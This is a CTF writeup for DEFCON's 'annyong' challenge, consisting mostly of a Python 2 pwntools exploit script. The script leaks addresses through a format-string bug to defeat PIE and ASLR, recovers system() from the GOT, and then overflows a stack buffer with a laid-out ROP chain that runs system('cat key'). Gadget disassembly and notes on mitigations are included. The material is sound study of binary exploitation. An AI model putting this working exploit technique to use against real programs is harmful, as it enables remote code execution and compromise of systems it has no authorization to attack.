DEFCON Writeup annyong
import sys
sys.path.append("/home/poteti/pwntools/")
from pwn import process
from struct import pack, unpack
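def read_addr_packed(packed_addr):
    """Decode a leaked little-endian pointer that was cut short at its first NUL.

    A ``%s`` format-string read stops at the first zero byte, so a 64-bit
    pointer from the target usually comes back as fewer than 8 bytes (the high
    bytes of a canonical user-space address are zero).  Right-pad with NULs to
    a full ``<Q`` and unpack it.

    Args:
        packed_addr: up to 8 leaked bytes (``str`` on Python 2, ``bytes`` on 3).

    Returns:
        The pointer as an int.

    Raises:
        struct.error: if more than 8 bytes were supplied.  ``ljust`` never
            truncates, so an over-long leak is rejected rather than silently
            cut down to a wrong address.
    """
    # ``ljust`` with a bytes pad is valid for both a Python 2 ``str`` and a
    # Python 3 ``bytes``; the original ``+ "\x00" * n`` only type-checked on 2.
    return unpack("<Q", packed_addr.ljust(8, b"\x00"))[0]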
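def send_read_format(process, read_addr):
    """Read the bytes at ``read_addr`` in the target through the format-string bug.

    Sends ``%7$s``, the marker ``aaaa`` and the packed address on one line.
    The target passes that line to printf as the format string, so ``%7$s``
    dereferences the 7th argument slot -- presumably the 8 bytes right after
    the marker in the input buffer -- and echoes whatever is there.  The reply
    up to the marker is the leaked data, decoded by ``read_addr_packed``.

    Args:
        process: the pwntools tube to talk to.  The name shadows the imported
            ``process`` factory inside this function; callers pass the tube.
        read_addr: absolute address to read from.

    Returns:
        The leaked value as an int.  The leak is NUL-terminated, so any zero
        byte inside the 8 bytes ends it early; ``read_addr_packed`` re-pads.

    Note:
        The argument index 7 is specific to this binary's stack layout at the
        printf call and must be re-derived for any other target.
    """
    # Bug fix: the original read the reply from the module-level ``p`` instead
    # of the ``process`` argument, so it only worked once a global ``p`` existed.
    process.send("%7$saaaa" + pack("<Q", read_addr) + "\n")
    reply = process.recv()
    leaked, _marker, _rest = reply.partition("aaaa")
    return read_addr_packed(leaked)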
# ---------------------------------------------------------------------------
# Stage 1: leak addresses through the format-string bug.
# The target hands user input to a printf-family function as the format
# string, so "%N$p" prints the N-th argument slot (a stack word) and "%N$s"
# dereferences it.  -Wformat-security / FORTIFY_SOURCE flag this at build
# time, and the class disappears when user data is only ever passed as a
# printf *argument*, never as the format.
# NOTE(review): send_read_format() above reads its reply from this global `p`
# rather than from its `process` parameter, so `p` must exist before the
# first call.
# ---------------------------------------------------------------------------
p = process("/home/poteti/training/annyong-fmtstr/annyong")
p.send("%4$p\n")
buf = int(p.recv()[:-1], 16) # buf == $rbp - 0x810 == rsp
p.send("%265$p\n")
return_addr = int(p.recv()[:-1], 16) # return: 0x1127
# The leaked return address is 0x1127 past the load base, so the binary is
# presumably PIE and its base is recovered by plain subtraction.
base_addr = return_addr - 0x1127
__libc_start_main_got_plt = base_addr + 0x202050 # __libc_start_main@got.plt:0x202050
# Arbitrary read via "%7$s": dereference the GOT slot to learn where libc was
# mapped.  One leak is enough to undo ASLR for the whole library.
__libc_start_main = send_read_format(p, __libc_start_main_got_plt)
# Disabled: the author's first approach scanned forward from
# __libc_start_main, one leak at a time, for the prologue bytes of system().
# It is kept as a bare string literal (never executed) and superseded by the
# hard-coded offset below.
'''
i = 0
system = None
while i < 160000:
print "offset:", i
signature = send_read_format(p, __libc_start_main+i) # signature: "\x53\x48\x83\xec YY \x48\x85\xff"
length = len(signature)
index = signature.find("\x53\x48\x83\xec")
if index != -1 and signature[index+5:index+8] == "\x48\x85\xff":
system = __libc_start_main+i+index
break
else :
i += length
i += 1
'''
# 149024 (0x24620) is the system - __libc_start_main distance for the libc
# build on the author's machine; presumably it has to be re-derived (e.g. with
# the scan above) for any other libc.
system = __libc_start_main + 149024
print "base address:", hex(base_addr)
print "__libc_start_main@got.plt:", hex(__libc_start_main_got_plt)
print "__libc_start_main:", hex(__libc_start_main)
print "system:", hex(system)
print ""
# ---------------------------------------------------------------------------
# Stage 2: overflow the 0x810-byte stack buffer and chain two gadgets from
# the (now de-randomized) binary into system().  The gadget bodies are in the
# disassembly at the end of the file.  A stack canary between buf and the
# saved rbp would abort at the function's return; the target evidently has
# none, and the read into buf is evidently unbounded.
# ---------------------------------------------------------------------------
ROP1 = base_addr + 0xfe3    # tail of a write() helper: reads -0x10(%rbp) and -0x4(%rbp), then leave; ret
ROP2 = base_addr + 0x1086   # mov %rsi,%rdi ; ret
cmd_addr = buf+0x848        # where "cat key" lands: 0x810 + 3*8 + 2*4 + 3*8 == 0x848 bytes into the payload
# Payload layout as offsets from buf (== rsp of the vulnerable frame):
#   0x810  saved rbp slot -> buf+0x830 (rbp1), which is what ROP1's -0x10/-0x4(%rbp) are relative to
#   0x818  return address -> ROP1
#   0x820  -0x10(rbp1) = cmd_addr, ROP1 moves it into rsi
#   0x828  unused
#   0x82c  -0x4(rbp1)  = fd for write(); bogus, that write simply fails
#   0x830  rbp2 value -> buf+0x840; ROP1's `leave` leaves rsp at buf+0x838
#   0x838  ROP1's ret  -> ROP2 (rsi -> rdi)
#   0x840  ROP2's ret  -> system(rdi == cmd_addr)
#   0x848  the command string
payload = ""
payload += "a"*0x810 # padding
payload += pack("<Q", buf+0x830) # rbp1
payload += pack("<Q", ROP1) # 0x4(rbp1)
payload += pack("<Q", cmd_addr) # -0x10(rbp1) == buf
payload += pack("<I", 0xdeadbeef) # -0x08(rbp1) is not used
payload += pack("<I", 0xdeadbeef) # -0x04(rbp1) == fd
payload += pack("<Q", buf+0x840) # rbp2
payload += pack("<Q", ROP2) # 0x4(rbp2)
payload += pack("<Q", system) # 0x8(rbp3)
payload += "cat key\x00\n" # cmd
p.send(payload)
p.recv()  # presumably the target's echo/prompt before the chain runs; discarded
print p.recv()  # output of system("cat key")
# Reference disassembly (a bare string literal, never executed) that the two
# gadget addresses were taken from, plus system() for its calling convention;
# kept verbatim from the writeup.
"""
ROP shellcode
mov rsi, -0x10(rbp1):
0fe3: 48 8b 45 f0 mov -0x10(%rbp),%rax
0fe7: 48 c7 45 e8 ff ff ff movq $0xffffffffffffffff,-0x18(%rbp)
0fee: ff
0fef: 48 89 c2 mov %rax,%rdx
0ff2: b8 00 00 00 00 mov $0x0,%eax
0ff7: 48 8b 4d e8 mov -0x18(%rbp),%rcx
0ffb: 48 89 d7 mov %rdx,%rdi
0ffe: f2 ae repnz scas %es:(%rdi),%al
1000: 48 89 c8 mov %rcx,%rax
1003: 48 f7 d0 not %rax
1006: 48 8d 50 ff lea -0x1(%rax),%rdx
100a: 48 8b 4d f0 mov -0x10(%rbp),%rcx
100e: 8b 45 fc mov -0x4(%rbp),%eax
1011: 48 89 ce mov %rcx,%rsi
1014: 89 c7 mov %eax,%edi
1016: e8 e5 fa ff ff callq b00 <write@plt>
101b: c9 leaveq
101c: c3 retq
mov rdi, rsi:
1086: 48 89 f7 mov %rsi,%rdi
1089: c3 retq
system(rdi):
push %rbx
sub $0x10,%rsp
test %rdi,%rdi
je 0x7ffff7a573f0 <system+32>
mov 0x381d74(%rip),%eax # 0x7ffff7dd9154
test %eax,%eax
jne 0x7ffff7a5740a <system+58>
add $0x10,%rsp
pop %rbx
jmpq 0x7ffff7a56ef0
xchg %ax,%ax
lea 0x13d0d4(%rip),%rdi # 0x7ffff7b944cb
callq 0x7ffff7a56ef0
test %eax,%eax
sete %al
movzbl %al,%eax
add $0x10,%rsp
pop %rbx
retq
mov %rdi,0x8(%rsp)
callq 0x7ffff7b19db0
mov 0x8(%rsp),%rdi
mov %eax,%ebx
callq 0x7ffff7a56ef0
mov %ebx,%edi
mov %eax,0x8(%rsp)
callq 0x7ffff7b19e10
mov 0x8(%rsp),%eax
jmp 0x7ffff7a57404 <system+52>
"""